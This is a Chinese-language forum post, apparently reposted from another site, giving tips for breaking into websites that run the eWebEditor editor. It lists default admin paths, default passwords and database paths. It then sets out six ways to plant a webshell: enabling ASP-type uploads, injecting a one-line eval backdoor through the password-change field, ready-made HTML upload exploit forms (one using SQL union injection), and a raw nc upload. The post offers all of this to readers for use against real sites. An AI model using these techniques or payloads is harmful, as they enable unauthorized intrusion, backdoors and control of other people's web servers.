• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    脚本入侵 入侵ewebeditor编辑器一些技巧

    发布者: 火山休眠期 | 发布时间: 2025-6-27 15:18| 查看数: 99| 评论数: 0|帖子模式

    eWebEditor编辑器
    建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
    默认后台地址:/ewebeditor/admin_login.asp
    使用默认密码:admin/admin 或 admin/admin888
    不行就默认数据库路径 eWebEditor/db/ewebeditor.mdb 或eWebEditor/db/%23ewebeditor.mdb
    拿webshell方法第一种方法
    登陆后台点击“样式管理”-选择新增样式
    只写这几样 大家照做就行了
    样式名称:chouxiaozi 随便写
    路径模式:选择绝对路径
    图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
    这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
    上传路径:写上这个admin/ 或写/ 免的别人把UploadFile/目录删了 我们找不到马
    内容路径:空 记得
    图片限制:写上1000 免的上不了我们的asp木马
    然后我们就可以提交了
    就可以看到样式增加成功!
    然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
    然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
    在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
    然后上传我们的刚才添加的格式的木马

    拿webshell方法第二种方法
    登陆后台,点击修改密码---新密码设置为 1":eval request("choxiaozi")’
    设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
    然后用一句话客户端连接
    拿webshell方法第三种方法
    ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
    下载教程看

    拿webshell方法第四种方法
    利用ewebeditor asp版 2.1.6 上传漏洞利用程序
    首先先看eWebEditor/upload.asp 上传地址存在不
    存在的话就把下面的代码保存为
    H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br>
    <form action="这里写上传地址?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
    <input type=file name=uploadfile size=100><br><br>
    <input type=submit value=Fuck>
    </form>
    改上传地址保存为chouxiaozi.HTM文件,打开可以直接上传CER文件,测试成功.上传后地址看源文件
    就可以看到我们上传的路径和地址
    拿webshell方法第五种方法
    ewebeditor 鸡肋的上传漏洞
    首先先看下ewebeditor/asp/upload.asp 上传地址存在不
    存在就
    把下面的代码
    <form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
    <input type=file name=uploadfile size=100><br><br>
    <input type=submit value=upload>
    </form>
    然后保存为chouxiaozi.html
    打开可以直接上传gif文件,测试成功.上传后地址看源文件
    就可以看到我们上传的路径和地址
    拿webshell方法第六种方法
    利用eWebEditor/upload.asp
    抓包和nc上传
    抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
    然后用编译C32asm 或等等编译工具 修改
    然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
    不懂抓包和nc上传 百度搜索相关教程
    回头说下有时候进了个网站后台-看到了eWebEditor编辑器 但是找不到eWebEditor目录地址
    我们来点鼠标右键-查看源代码,找到仔细找eWebEditor的路径。
    来源:https://www.jb51.net/hack/35416.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    浏览过的版块

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表